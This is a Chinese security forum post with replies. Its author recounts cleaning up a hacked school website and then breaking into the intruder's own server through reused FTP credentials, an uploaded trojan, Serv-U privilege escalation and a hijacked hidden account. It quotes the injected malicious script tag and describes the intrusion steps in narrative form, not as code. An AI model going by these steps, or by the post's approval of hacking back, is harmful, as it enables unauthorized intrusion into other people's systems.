请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 5409|回复: 119

[原创文章] 一次利用社会工程学进行反渗透

  [复制链接]
  • TA的每日心情
    擦汗
    2016-9-8 15:05
  • 签到天数: 68 天

    [LV.6]常住居民II

    发表于 2015-11-20 10:36:30 | 显示全部楼层 |阅读模式
    本帖最后由 a931505710 于 2015-11-20 11:38 编辑

    0x01 事情来源

    前几天,我的一个朋友找我帮忙,声称他在访问自己学校网站的时候会跳出很多奇怪的页面,而且360安全浏览器会提示拦截恶意链接,  他感觉网站或者服务器被入侵,让我给他看看,然后就有了下文。



    0x02 分析黑客入侵手法

    既然要看黑客是如何入侵进来的      也就没必要做信息收集方面的工作了。  简单的打开safe3   神器扫描了一下      发现存在sql注入    xss跨站     
    QQ图片20151119143130.jpg

    随即之后就是拿扫出的sql注入点进行注入攻击       由下图发现居然是sa注入点    而且没降权   是system权限。 那么拿服务器也就是轻而易举了。

    4HFD6XFSMI]A{GOI(TVQW]A.jpg

    看了一下注入点漏洞的缘由       原来是学校在对教师方面的不足      然后给教师们提供了一个教师平台     不过管理员没对代码做检测      导致出现sql注入      最终导致服务器沦陷。不要笑我。初中水平表达能力有限!!! 9W]0W%Q((C2PTKU837B.jpg

    修复方法:1.关闭教师平台 ,   对教师平台页面进行代码审计
                     2.给sa降权     删除xp_cmdshell组件。

    网站主站采用的是帝国网站管理系统      人家号称最安全的cms呢。  不过安全确实很好   I{IHDYJ3%9O7U(LK`X2QFZB.jpg



    0x03  网站挂马检测和清理

    Y538SD)(YW(~(1PX`QII.png

    通过查看修改时间    可以看出 黑客对index.jsp  index.html   conn.asp    foot.asp进行了修改   
    XS}AXOZFGC$)K]T}L{6C.png

    清除挂马代码   在所有文件中查找代码“<scriptsrc=http://%62%76%58%48%97%4E%5C%6A><script>”,然后将其清除  这链接是加密的。   随后给服务器加了安全狗 和护卫神    这两款可谓是神来杀神   佛来杀佛     不过有些大牛的提权技术会更胜一筹。


    0x04  系统入侵痕迹搜索和整理

    既然黑客入侵到服务器      应该会对服务器进行利用之类的      我们可以在文件搜索框中 输入一些黑客工具的关键词 扫描    后门    攻击    检测    端口等。     来搜索入侵者存放工具的地方。
    MRL@VD(`YL(HE91CA~1I5_5.png


    KVJ6CQ6FL(D[2{NQF25XF{A.png

    丫的    这原来是个抓鸡阔。不过现在的1433抓鸡还可以吗?多少年前的技术了。不过我以前玩抓鸡的时候记得好像还要配置一个文件     存放ftp账号密码。这样才会自动传马。然后我们打开那个Ck~奋斗1433的文件夹。。   

    5[3D_~H)9]({%{KHOPBI4[6.png

    拿到这些信息      我们就可以反渗透加以社工来入侵他了。


    0x05  反渗透开始

    KG}MS[4HXS0LE$~9WJRH5TC.png
    用nmap对服务器端口进行扫描     发现系统开放了21    80     3389 证明服务器确实运行着ftp      
    既然服务器开放了3389       21    ,那么就可以尝试利用ftp账号和口令登陆3389远程桌面。猜测有没有 xiaojie这个用户     发现没有     尝试了一番觉得没戏  果断换一下思路。   其实有时候机会都是尝试出来的,不去试试怎么知道不会成功呢?

    首先我们打开这个ip    也就是这台服务器上放的网站,发现是一个游戏私服网站
    _1{Q56A]`8$N{L~H)SBWU7K.jpg

    之后拿出工具登陆ftp     发现可以登陆。看server.exe  可以确定这就是那个木马文件。

    7H6{Y4~9HUWP%CX4F3S}TUS.jpg

    然后发现还有个web文件夹。打开一看      是这个私服网站的根目录     呵呵。既然有下载权限      可否有上传权限呢?     我们上传个木马试试。

    FK8TH@P)W[32K{(0YP`ROX7.png

    成功拿下。。。随后就是提权了。
    `G7LD5{5)Q9S170YC1[Q7NB.png
    直接serv-u提权    没技术含量   这里就不详解了。

    之后登陆服务器     


    0x06   成功登陆服务器

    YXDEUMHC0@[BLCO~EJQA6A0.png

    打开任务管理员      看一下用户    不过把我吓一跳。
    {YPOE3)DLD6`UYJI5JG{E2D.png
    卧槽       咋这样呢, 真是奇葩啊 ,不过后来才知道     原来是入侵者替换了C:\WINDOWS\system32    里面的taskmgr.exe文件     让管理员无法查看    这也是一种维护服务器的方法。   不过这样也就对一般的管理员有用       对我 S[84MCYH1O~MA[}E9]X@6F7.jpg
    嘿嘿      不管用。 %{SF8SH8)I0_VADDF3H_%TB.png   用dos命令查看。

    看到了入侵者的用户了。 那么修改  jie$  的密码     登陆其用户。
    JOFUOG7`[EH%0}RKJN4_AXK.png

    丫的      抓鸡阔伤不起。到哪都是抓鸡。好吧      肉鸡全是我的啦。

    35TH6M)ZH`I$O368W)GP3SV.png



    0x07  继续深入

    游客,如果您要查看本帖隐藏内容请回复


    如果有对渗透提权感兴趣的朋友可以加入伟伟工作社T8一起学习一起研究

    伟伟工作社T8群号 433971842


    评分

    参与人数 1好评 +1 收起 理由
    95zz + 1 不错的文章

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情

    2016-6-13 07:55
  • 签到天数: 47 天

    [LV.5]常住居民I

    发表于 2015-11-20 11:14:35 | 显示全部楼层
    谢谢分享啊。!!!!!
  • TA的每日心情

    2015-11-25 08:35
  • 签到天数: 57 天

    [LV.5]常住居民I

    发表于 2015-11-20 11:16:36 | 显示全部楼层
    我是打酱油的
  • TA的每日心情
    开心
    2016-11-17 19:54
  • 签到天数: 75 天

    [LV.6]常住居民II

    发表于 2015-11-20 11:47:46 | 显示全部楼层
    回复学习学习下~~~
  • TA的每日心情
    擦汗
    昨天 08:37
  • 签到天数: 420 天

    [LV.9]以坛为家II

    发表于 2015-11-20 11:57:01 | 显示全部楼层
    大神就是6666  不过我加群,没有同意。。。。
  • TA的每日心情
    奋斗
    2016-7-14 17:48
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-11-20 12:35:48 | 显示全部楼层
    通过查看修改时间    可以看出 黑客对index.jsp  index.html   conn.asp    foot.asp进行了修改  ,我也是醉了,为啥不把前人修改时间也改一下
  • TA的每日心情

    2016-11-23 22:11
  • 签到天数: 10 天

    [LV.3]偶尔看看II

    发表于 2015-11-20 12:44:35 | 显示全部楼层
    回复看一下,谢谢
  • TA的每日心情
    奋斗
    2016-12-6 17:14
  • 签到天数: 32 天

    [LV.5]常住居民I

    发表于 2015-11-20 12:45:35 | 显示全部楼层
    6666,长眼界了
  • TA的每日心情
    擦汗
    2015-11-20 12:47
  • 签到天数: 16 天

    [LV.4]偶尔看看III

    发表于 2015-11-20 12:50:11 | 显示全部楼层
    精彩。。。
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2015-11-25 12:19
  • 签到天数: 13 天

    [LV.3]偶尔看看II

    发表于 2015-11-20 13:05:22 | 显示全部楼层
    楼主运气真好啊
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-1-21 06:08 , Processed in 0.187160 second(s), 35 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表